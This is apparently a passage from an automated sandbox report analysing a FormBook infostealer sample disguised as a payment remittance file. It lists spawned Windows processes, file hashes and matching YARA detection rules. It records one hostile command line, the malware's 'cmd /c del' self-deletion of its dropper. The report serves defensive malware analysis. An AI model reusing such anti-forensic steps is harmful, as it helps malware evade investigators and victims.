                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.271535377.000000000E28B000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.271535377.000000000E28B000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:high

                                                            Analysis Process: autoconv.exe PID: 1392 Parent PID: 3388

                                                            General

                                                            Start time:08:16:16
                                                            Start date:15/09/2021
                                                            Path:C:\Windows\SysWOW64\autoconv.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                            Imagebase:0x950000
                                                            File size:851968 bytes
                                                            MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            Analysis Process: raserver.exe PID: 3652 Parent PID: 3388

                                                            General

                                                            Start time:08:16:16
                                                            Start date:15/09/2021
                                                            Path:C:\Windows\SysWOW64\raserver.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\raserver.exe
                                                            Imagebase:0xc30000
                                                            File size:108544 bytes
                                                            MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.477256169.00000000043F0000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.477256169.00000000043F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.477256169.00000000043F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.473607935.0000000000700000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.473607935.0000000000700000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.473607935.0000000000700000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:moderate

                                                            Analysis Process: cmd.exe PID: 912 Parent PID: 3652

                                                            General

                                                            Start time:08:16:20
                                                            Start date:15/09/2021
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:/c del 'C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe'
                                                            Imagebase:0xbd0000
                                                            File size:232960 bytes
                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Analysis Process: conhost.exe PID: 1392 Parent PID: 912

                                                            General

                                                            Start time:08:16:21
                                                            Start date:15/09/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6b2800000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Disassembly

                                                            Code Analysis

                                                            Reset < >